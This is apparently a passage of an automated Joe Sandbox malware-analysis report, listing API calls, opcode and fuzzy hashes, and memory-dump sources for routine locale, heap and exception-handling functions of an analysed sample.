                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionRaise
                                                                                                          • String ID:
                                                                                                          • API String ID: 3997070919-0
                                                                                                          • Opcode ID: 21535f1f760f8cc43c3c8d2f86473194e1212b5fbddb0c72c70cec244272ecd0
                                                                                                          • Instruction ID: af86691c6bf59843804866fe46e37058d04c49fc32cd52b5519ec18ab2620002
                                                                                                          • Opcode Fuzzy Hash: 21535f1f760f8cc43c3c8d2f86473194e1212b5fbddb0c72c70cec244272ecd0
                                                                                                          • Instruction Fuzzy Hash: 88B12A326106089FD715CF6CC48ABA57BA1FF49364F258658E999CF2E1C339DD92CB40
                                                                                                          APIs
                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007061AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                          • String ID:
                                                                                                          • API String ID: 2325560087-0
                                                                                                          • Opcode ID: 66254dbf07ba5f98cdfc5c8a234c26c885d332361631aa74e1acfd880ac5646e
                                                                                                          • Instruction ID: a37ebf87c7b5231cc2f5d95776b781541a98f04994c71d624e2e9ef825171455
                                                                                                          • Opcode Fuzzy Hash: 66254dbf07ba5f98cdfc5c8a234c26c885d332361631aa74e1acfd880ac5646e
                                                                                                          • Instruction Fuzzy Hash: B4A15CB1A14745CFEB18CF54D8B16A9BBF1FB58325F24D62AD401E72A0D338A950CF94
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 0-4108050209
                                                                                                          • Opcode ID: 46c0d3cf4716e6af21954a6c5105bcf2ba9f673035f8e21b5042299e40b40c11
                                                                                                          • Instruction ID: 65e376711aa53640ffffa5309543b109cb35de120309aa1237aa24611242a431
                                                                                                          • Opcode Fuzzy Hash: 46c0d3cf4716e6af21954a6c5105bcf2ba9f673035f8e21b5042299e40b40c11
                                                                                                          • Instruction Fuzzy Hash: 52C1AEB490060ACFCB26CFA8C9946BABBF1FF09314F148759E492976D2C339AD45CB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007189D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3736152602-0
                                                                                                          • Opcode ID: f04cd9d5eda0fc56d5be1bbac631a39196704ac1767e3f6e7b2d57a8b6123de5
                                                                                                          • Instruction ID: f6f92e39ad074c31ac6396c6625ad4097c07a11b47e9a89d62c4a84dcff4b6ec
                                                                                                          • Opcode Fuzzy Hash: f04cd9d5eda0fc56d5be1bbac631a39196704ac1767e3f6e7b2d57a8b6123de5
                                                                                                          • Instruction Fuzzy Hash: 60218372615206ABDB289A2CDC55AFA77A8EF04354F14407AFD01D62C1EF7CED808A51
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 0-4108050209
                                                                                                          • Opcode ID: 9986ef7650725eb17fa9e14fcae2b236755a30b390f5513a54414da1149a07b9
                                                                                                          • Instruction ID: 2c92a0ea9242a00d18d598128f490c119bf36300c0023dd4f7672d8c740b4c13
                                                                                                          • Opcode Fuzzy Hash: 9986ef7650725eb17fa9e14fcae2b236755a30b390f5513a54414da1149a07b9
                                                                                                          • Instruction Fuzzy Hash: 5BB1CF70A0070BEBCB25CE68C55AABFB7F1AF01300F144B19E49297AD5D739EA41CB52
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • EnumSystemLocalesW.KERNEL32(007186CB,00000001,00000000,?,-00000050,?,007184BB,00000000,-00000002,00000000,?,00000055,?), ref: 007186A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2417226690-0
                                                                                                          • Opcode ID: fe41645b35e02da4ecb1c4297cc1b4aec8f322e25a8ecebd73474df4319e0af0
                                                                                                          • Instruction ID: bc89011a0bf9c2fa39b064391cbd5e20a3503eec00fa35c62b0ae677d783e027
                                                                                                          • Opcode Fuzzy Hash: fe41645b35e02da4ecb1c4297cc1b4aec8f322e25a8ecebd73474df4319e0af0
                                                                                                          • Instruction Fuzzy Hash: 0E11293A2007019FDB289F3CD8916FAB791FF80318B15442CE94787681E779B982C740
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00718AF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3736152602-0
                                                                                                          • Opcode ID: 8c08276efd1569ad44b7c5b9ec48e09fc6ca01f7abaa342adc5d877d9ce156e7
                                                                                                          • Instruction ID: 0e032c92d68f3a065a115dbdb4b541c0fcc6c3731e155ef8b5bf0e369b9ae78b
                                                                                                          • Opcode Fuzzy Hash: 8c08276efd1569ad44b7c5b9ec48e09fc6ca01f7abaa342adc5d877d9ce156e7
                                                                                                          • Instruction Fuzzy Hash: A811A3B26155069BDB249B2CDC46AFA73E8EF04310B10417AF906D72C1EF7CEE418791
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007188E7,00000000,00000000,?), ref: 00718C76
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3736152602-0
                                                                                                          • Opcode ID: 835c14b8498299847e1ea97061d196f4a29eba6ec12966efb12f23ceaf7edd35
                                                                                                          • Instruction ID: 162f159ad2405537fead70d9aa2a35ead533bbab7741a02d52e0b00bf4fa2bc4
                                                                                                          • Opcode Fuzzy Hash: 835c14b8498299847e1ea97061d196f4a29eba6ec12966efb12f23ceaf7edd35
                                                                                                          • Instruction Fuzzy Hash: 5001D632A00612ABDB785F28C8467FA7768DB40394F154469AC46A32C0EE7CFF81C6F1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • EnumSystemLocalesW.KERNEL32(0071897D,00000001,?,?,-00000050,?,00718483,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00718968
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2417226690-0
                                                                                                          • Opcode ID: d04f09c8e83b6d75e6a4f06604190d674e9e5ed6331859e763b1a9313fe1446c
                                                                                                          • Instruction ID: 37fcba3d927640a90c5c8b84acb6b69e649e49530db0be325057e43da8a7fe7b
                                                                                                          • Opcode Fuzzy Hash: d04f09c8e83b6d75e6a4f06604190d674e9e5ed6331859e763b1a9313fe1446c
                                                                                                          • Instruction Fuzzy Hash: A6F0F6363003045FDB245F3DDC85ABA7B91EF80368F15842DF9458B6D0DABAAC82CB51
                                                                                                          APIs
                                                                                                            • Part of subcall function 0070F547: EnterCriticalSection.KERNEL32(?,?,0070CD41,00000000,0072E728,0000000C,0070CCFA,00001000,?,007144CA,00001000,?,007135B1,00000001,00000364,?), ref: 0070F556
                                                                                                          • EnumSystemLocalesW.KERNEL32(0071439A,00000001,0072EBA0,0000000C,00713DA8,-00000050), ref: 007143DF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 1272433827-0
                                                                                                          • Opcode ID: 5003367f97003b74aebbb47c2fd384157e7e5702dbece5dcbc3a55790230483a
                                                                                                          • Instruction ID: 9761c2d3b406e5fb719473370ae60b4db7114da25c920829923f57f2c41bcaca
                                                                                                          • Opcode Fuzzy Hash: 5003367f97003b74aebbb47c2fd384157e7e5702dbece5dcbc3a55790230483a
                                                                                                          • Instruction Fuzzy Hash: A9F03772A00214DFEB14EF98E846B9E77F0FB08725F10826AE4119B2E1D7795941CF54
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • EnumSystemLocalesW.KERNEL32(00718A9D,00000001,?,?,?,007184DD,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00718A89
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2417226690-0
                                                                                                          • Opcode ID: 3db87f0f58c50d49b43366e1159963f8f8af40b95d38f23b368ac87c94414d95
                                                                                                          • Instruction ID: 7241fc9e53442abe5f82861563e1065e7fdb6072be09268bfa802da6013a2587
                                                                                                          • Opcode Fuzzy Hash: 3db87f0f58c50d49b43366e1159963f8f8af40b95d38f23b368ac87c94414d95
                                                                                                          • Instruction Fuzzy Hash: A8F0E53670020697CB149F79EC496AA7F94EFC1724B1A805AEA058B290CA7999C2C790
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001663D), ref: 00706521
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: 668712c78d0497d4ed32648897e25115445603ef4697cfa78275fbc18d31f622
                                                                                                          • Instruction ID: f1880dbd6a3abe2d91e49a1b9e14345e2262e407c5eb8a7f0bbfdb6dc77dc342
                                                                                                          • Opcode Fuzzy Hash: 668712c78d0497d4ed32648897e25115445603ef4697cfa78275fbc18d31f622
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 54951025-0
                                                                                                          • Opcode ID: 12d249f456562637b17df62bc653dc56a9441f6e309ae65a52307e941c25c063
                                                                                                          • Instruction ID: c7ec1d8044431e2b85ce776aaecdccb5f75bf8018eb7bffdfe06b7e4466af538
                                                                                                          • Opcode Fuzzy Hash: 12d249f456562637b17df62bc653dc56a9441f6e309ae65a52307e941c25c063
                                                                                                          • Instruction Fuzzy Hash: 3AA001706022058BA7648F35AB0A3193AA9EA86692B158069A549C5161EA2CA8929A09
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c2365c02a9af1a5e1b8f95a32706f352c4887d191f60aaec3355353cf5bf28d8
                                                                                                          • Instruction ID: 51906d28d5f45ecf7b77b42405fbebf4588097ba4d7754fca8eb1de8c16fab21
                                                                                                          • Opcode Fuzzy Hash: c2365c02a9af1a5e1b8f95a32706f352c4887d191f60aaec3355353cf5bf28d8
                                                                                                          • Instruction Fuzzy Hash: 075178B4D0020DDFCB40DFA8D5919EEBBF5AB0A350F24545AE915FB310DB34AA41CB65
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 68c60a5da7261ddb67113a727615a83c8534e18671ec4a8063a369fa6758cfbc
                                                                                                          • Instruction ID: a4793e5b9cfa791eaae12b8736d24b50a5b718f3ead75103566f54791a2da024
                                                                                                          • Opcode Fuzzy Hash: 68c60a5da7261ddb67113a727615a83c8534e18671ec4a8063a369fa6758cfbc
                                                                                                          • Instruction Fuzzy Hash: 6BD06C7A641A58AFC210CF4AE440D41F7A8FB89671B158066EA0993B20C235F811CEE0
                                                                                                          APIs
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00707977
                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0070797F
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00707A08
                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00707A33
                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00707A88
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmpDownload File
